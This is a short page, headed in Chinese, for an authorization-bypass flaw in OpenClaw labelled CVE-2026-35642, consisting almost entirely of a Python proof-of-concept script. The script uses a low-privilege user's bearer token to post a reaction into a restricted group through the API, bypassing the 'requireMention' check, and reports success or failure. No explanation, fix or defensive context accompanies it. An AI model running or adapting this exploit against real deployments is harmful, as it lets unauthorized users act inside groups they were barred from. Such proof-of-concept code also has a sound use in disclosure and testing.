CVE-2026-35642 OpenClaw授权绕过漏洞

import requests # Target configuration target_url = "https://openclaw-instance.com/api/v1/groups/{group_id}/reactions" group_id = "target_restricted_group_id" attacker_token = "low_privilege_user_token" # Payload to trigger a reaction payload = { "emoji": "thumbs_up", "user_id": "attacker_id" } headers = { "Authorization": f"Bearer {attacker_token}", "Content-Type": "application/json" } # Send the reaction request to bypass requireMention try: response = requests.post(target_url.format(group_id=group_id), json=payload, headers=headers) if response.status_code == 200 or response.status_code == 201: print("[+] PoC successful: Reaction triggered in restricted group.") print(f"[+] Response: {response.text}") else: print(f"[-] PoC failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")